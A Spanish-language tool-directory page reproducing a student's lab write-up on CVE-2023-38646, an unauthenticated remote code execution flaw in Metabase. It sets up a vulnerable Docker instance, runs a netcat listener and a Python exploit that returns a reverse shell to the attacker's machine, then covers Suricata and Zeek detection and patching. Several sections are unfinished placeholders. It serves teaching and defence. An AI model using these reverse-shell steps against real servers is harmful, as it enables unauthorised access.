Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Herramientas DefensivasAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónDetección de IntrusionesAprendizaje y EducaciónRespuesta a IncidentesDesarrollo de Payloads
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2023-38646 — Prueba de Concepto de Ejecución Remota de Código (RCE) en Metabase

Resumen

Este repositorio documenta un proyecto de investigación de seguridad tipo Prueba de Concepto (PoC) que analiza CVE-2023-38646, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) sin autenticación que afecta a versiones vulnerables de Metabase.

El objetivo de este proyecto es demostrar el ciclo de vida completo de una vulnerabilidad real, incluyendo:

  • Comprender la vulnerabilidad y su causa raíz
  • Reproducir el exploit en un entorno de laboratorio controlado
  • Establecer una shell inversa en el sistema vulnerable
  • Observar el comportamiento del ataque mediante herramientas de monitorización de red
  • Demostrar técnicas de ingeniería de detección
  • Proponer estrategias de mitigación defensivas

Este repositorio está diseñado para mostrar habilidades prácticas en:

  • Investigación de vulnerabilidades
  • Reproducción de exploits
  • Uso de shells inversas
  • Análisis de tráfico de red
  • Sistemas de detección de intrusiones
  • Estrategias de mitigación de seguridad

Contexto de la Vulnerabilidad

CVE-2023-38646 es una vulnerabilidad crítica que afecta a ciertas versiones de Metabase, una plataforma de inteligencia empresarial y análisis de código abierto.

La vulnerabilidad permite a un atacante lograr ejecución remota de código sin autenticación aprovechando debilidades en el proceso de instalación o configuración de la aplicación.

Detalles clave:

  • ID CVE: CVE-2023-38646
  • Severidad: Crítica
  • Puntuación CVSS: 9.8
  • Vector de ataque: Red
  • Autenticación requerida: No
  • Impacto: Ejecución Remota de Código (RCE)

La explotación exitosa permite a un atacante:

  • Ejecutar comandos arbitrarios en el sistema objetivo
  • Establecer una shell inversa
  • Potencialmente obtener un compromiso total del sistema

Referencias oficiales:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

Tecnologías y Herramientas Utilizadas

Este proyecto combina tanto herramientas de seguridad ofensiva como herramientas de monitorización defensiva.

Seguridad Ofensiva

  • Python
  • Payloads de shell inversa
  • Script de exploit personalizado
  • Instancia vulnerable de Metabase

Detección y Monitorización

  • Suricata — Sistema de Detección de Intrusiones (IDS)
  • Zeek — Monitorización de Seguridad de Red (NSM)

Tecnologías Defensivas

  • ModSecurity — Cortafuegos de Aplicaciones Web (WAF)
  • OSSEC — Sistema de Detección de Intrusiones basado en Host (HIDS)

Entorno de Laboratorio

Pendiente — describe la configuración de tu laboratorio

Ejemplo:

  • Máquina atacante: Kali Linux
  • Máquina objetivo: Servidor Metabase vulnerable
  • Máquina de monitorización de red: Máquina virtual de monitorización de seguridad

PoC de Explotación

Diagrama de la Cadena de Ataque

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Vulnerable Metabase Instance]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell Established]
    E --> F[Command Execution on Target]

Este diagrama ilustra el flujo de ataque de alto nivel utilizado en este proyecto.

Configuración de la Prueba de Concepto (PoC)

Instalación y configuración de Docker:

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Inicio de Docker:

Se desplegó una instancia vulnerable de Metabase Enterprise (v1.44.0) usando Docker.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

Esto expone la interfaz web de Metabase en el puerto 3000, permitiendo el acceso a la página de configuración.

Si Docker ya está en ejecución, ejecuta las siguientes líneas de comando para empezar de nuevo:

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

'Configuración de Docker' Pendiente

Una vez que el contenedor está en ejecución, la interfaz de Metabase se vuelve accesible a través del navegador.

root@kitploit:~
    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

La página de configuración confirma que la instancia de Metabase está activa y lista para su configuración.

Escenario de Explotación 1

BurpSuite

Demo / Documentación

Pendiente de capturas de pantalla o explicación

Escenario de Explotación 2 — Explotación mediante Script Python

  1. Preparación del listener de shell inversa

Antes de lanzar el exploit, se inicia un listener de Netcat en la máquina atacante para recibir la conexión de la shell inversa.

root@kitploit:~
    nc -lvnp 6666

Este listener espera conexiones entrantes del servidor Metabase explotado.

Pendiente de capturas de pantalla o explicación

  1. Ejecución del exploit El script del exploit se ejecuta desde la máquina atacante.
root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit Name
    --rhost http://192.168.1.136:3000 \         ---> Targer IP Address
    --lhost 192.168.1.137 \                     ---> Attacker's IP Address
    --lport 6666                                ---> Attacker's Listening Port

El payload ejecuta un comando que establece una shell inversa de vuelta a la máquina atacante.

  1. Shell inversa establecida Una vez que el payload se ejecuta con éxito, la instancia vulnerable de Metabase inicia una conexión de vuelta a la máquina del atacante.

El listener de Netcat recibe la conexión, otorgando al atacante acceso de shell al sistema.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

Para confirmar la conexión con el dispositivo de la víctima:

root@kitploit:~
    whoami

Salida:

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

PoC de Ingeniería de Detección

Este proyecto también demuestra cómo se puede detectar la actividad de explotación mediante herramientas de monitorización de red.

Detección con Suricata

Se utilizó Suricata (IDS) para monitorizar el tráfico de red en busca de patrones sospechosos asociados con el exploit.

root@kitploit:~
sudo suricata -i eth0

Pendiente: inserta captura de pantalla de alerta de Suricata

root@kitploit:~
evidence/detection/suricata_alert.png

Para observar las alertas en tiempo real, los registros de Suricata se monitorizaron usando:

root@kitploit:~
tail -f /var/log/suricata/fast.log

Pendiente: inserta captura de pantalla del registro de Suricata

root@kitploit:~
evidence/detection/suricata_log.png

Para un enfoque pasivo, se utilizó un script de notificación personalizado para generar alertas de escritorio cada vez que Suricata detecta tráfico sospechoso.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

Cuando se ejecutó el exploit, Suricata generó alertas indicando actividad sospechosa asociada con el intento de explotación de Metabase.

Pendiente: inserta captura de pantalla del registro de Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Ejemplo:

Pendiente: inserta captura de pantalla del registro de Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Análisis de Red con Zeek

Además de la monitorización con IDS, se utilizó Zeek para analizar el tráfico de red e identificar comportamientos anómalos.

Zeek se inicia usando estos comandos para comenzar a capturar y analizar el tráfico de red:

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

Pendiente: inserta captura de pantalla del inicio de Zeek

root@kitploit:~
evidence/detection/zeek.png

Al inspeccionar los registros de conexión, se puede observar el tráfico de la shell inversa en el puerto 6666.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

Pendiente: inserta captura de pantalla del registro de Zeek

root@kitploit:~
evidence/detection/zeek_log.png

Mitigación y Estrategias Defensivas

Varias estrategias de mitigación pueden reducir el riesgo de explotación.

EstrategiaDescripción
Gestión de parchesActualizar Metabase a una versión que parchee CVE-2023-38646
Cortafuegos de Aplicaciones Web (ModSecurity)Filtrar solicitudes HTTP maliciosas

Estructura del Repositorio

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

Resumen

Este proyecto demuestra el ciclo de vida completo del análisis y la reproducción de una vulnerabilidad crítica real.

El PoC muestra:

  • análisis de vulnerabilidades
  • reproducción de exploits
  • ejecución de shell inversa
  • monitorización de tráfico de red
  • detección de intrusiones
  • estrategias de mitigación defensivas

El objetivo de este repositorio es proporcionar un caso de estudio técnico que ilustre prácticas de ciberseguridad tanto ofensivas como defensivas.


🖋️ Autor

Styverson Ng

Bachelor of Information Technology
Artificial Intelligence & Autonomous Systems
Cyber Security & Cyber Forensics

Murdoch University

Descargar herramienta
Detección de intrusiones en el host (OSSEC)Monitorizar comportamientos sospechosos del sistema
Monitorización de red (Suricata y Zeek)Detectar patrones de tráfico anómalos